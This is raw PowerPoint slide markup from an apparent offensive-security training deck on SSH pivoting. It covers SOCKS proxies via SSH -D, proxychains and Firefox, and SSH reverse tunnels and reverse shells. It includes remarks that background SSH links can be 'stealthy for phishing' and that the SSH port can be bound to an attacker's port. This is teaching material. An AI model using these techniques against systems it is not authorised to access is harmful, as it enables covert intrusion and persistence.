          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750868" y="2182524"/>
            <a:ext cx="6729306" cy="1798349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D5E31D2-A3A4-4214-9177-4ED344AD63C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1602297" y="3884103"/>
            <a:ext cx="360727" cy="1359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4B7863-F5B1-400B-960C-7B6A6717E1AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696286" y="5243119"/>
            <a:ext cx="1812022" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can choose socks4 or socks5. SOCKS5 is more recent.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AB22A66-4BDE-4857-95CD-25E5C5CBF5AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3665989" y="3884103"/>
            <a:ext cx="1" cy="1241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CC33537-72C9-480C-B535-E3370E8087A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701256" y="5125673"/>
            <a:ext cx="1812019" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SOCKS5 IP address, in case your SOCKS5 server is remote.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A044B7E-E1F2-406B-B128-EA91C9AD991A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5025006" y="3852618"/>
            <a:ext cx="1012720" cy="996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1B7F97-131D-48FA-98C9-BB7CF2C1B632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706223" y="4848675"/>
            <a:ext cx="2663006" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port number upon which SOCKS proxy is hosted. This can be any number you want but must be the same port number used for SSH –D </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214179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9">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D760B83-0A67-4263-9C49-DD06CA78E607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921897" y="70104"/>
            <a:ext cx="8288032" cy="1096648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0"/>
              <a:t>Configuring SOCKS on SSH: Test Proxychains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C1C655-0770-401F-8F00-BCF641A77A52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2635657" y="4669541"/>
            <a:ext cx="2416029" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Testing the connection by routing through configured proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F819267-ED84-4738-86B0-B4027B233EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="888297" y="1366130"/>
            <a:ext cx="8715145" cy="1681870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9807A9F-475D-4574-BEF8-A68AF8556E0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3783435" y="1619075"/>
            <a:ext cx="0" cy="3011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80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6502-4BCE-40C6-B2D5-0C9D3D47CDA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Configuring SOCKS on Firefox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B18645C3-B684-4C95-8EFC-D35C0656B7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="12500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2624989" y="1270000"/>
            <a:ext cx="5467465" cy="5267325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381159EC-BC57-44AF-88DD-7D94A0CC9746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824182" y="2135909"/>
            <a:ext cx="934186" cy="187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03B74A0-3A4C-4B5A-A28D-3B46AFA2BBE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824182" y="2135909"/>
            <a:ext cx="1715972" cy="1353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3DB7E2C-31BE-46FE-93B6-253F1443463F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824182" y="2135909"/>
            <a:ext cx="5767855" cy="1421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CE3339-78B9-4AF0-91E3-84790AF8037D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824182" y="2135909"/>
            <a:ext cx="857986" cy="3946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D8A393E-7BAA-4A73-AE97-B49E7619EDB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8075063" y="3028155"/>
            <a:ext cx="1464629" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port number of SOCKS from SSH -D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5FCBD6-F59F-4A33-BB9A-AF2E6F93AD00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4904292" y="3662133"/>
            <a:ext cx="1464629" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOCKS v5 supports TCP/UDP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2D053A-9BAC-41EB-BCB1-E978DE64714A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918976" y="5620353"/>
            <a:ext cx="1810412" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Resolve hostnames of internal hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABCB656B-B70E-4660-9492-18A41A6D9A98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100668" y="1786855"/>
            <a:ext cx="1647314" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Key points of SOCKS configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C723F4DB-9EA0-4975-87DD-375086E27FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3627287" y="3008768"/>
            <a:ext cx="2088859" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP address of SOCKS Connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335232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CF640AA-D9F8-4B8B-A432-31A7E0CB3AD6}"/>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Introduction to Reverse Shells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7691A47-06F9-449F-AB5D-938A7406FEAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A reverse connection which originates from the destination rather than client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A reverse shell is a network socket which contains shell access to your target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A reverse shell can be established in many ways to ensure it’s secure and our method is reliable; we can use SSH to give us a reverse shell via reverse tunnel. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse SSH tunnel and reverse shell are completely separate processes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306150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4B7F-9F65-4D56-A703-46E725552BD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Adding SSH Reverse Shell Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB2BBAF-27E5-4DD2-8441-D2F4751CDDEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2662815686"/>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374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AACC2CD-A5E5-4B04-9F4C-4E9056996EE5}"/>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Defensive SSH Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7370CEA7-49DE-453B-B70F-56BA565CD7EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Although the objective is to conduct offensive security, defensive measures must be taken to protect your own assets when infiltrating target machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH –N: No remote command execution, preventing the /bin/false account from returning an error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH –f: Background the SSH shell, handy for when the SSH link is simply a proxy link and can be stealthy for phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH –R: Reverse SSH tunnelling. Binding the SSH port to a remotely available attacker port, allowing for a secondary protected communications channel with use of –N.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345682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A74A-562A-4445-A862-C3770DAF35EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SSH Reverse Shell in Action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC7BFD2-2454-435E-B658-AF49D1C33B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1417715"/>
            <a:ext cx="3771900" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758D1DB3-AB97-4C88-9D8C-DF6CA241D19B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="21852" b="56050"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1844977"/>
            <a:ext cx="5791200" cy="980812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED7D475-F75F-4242-9071-17B534BD0E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2929317"/>
            <a:ext cx="5295900" cy="771525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4201676F-28EB-4562-B6C9-6F57542DEA15}"/>
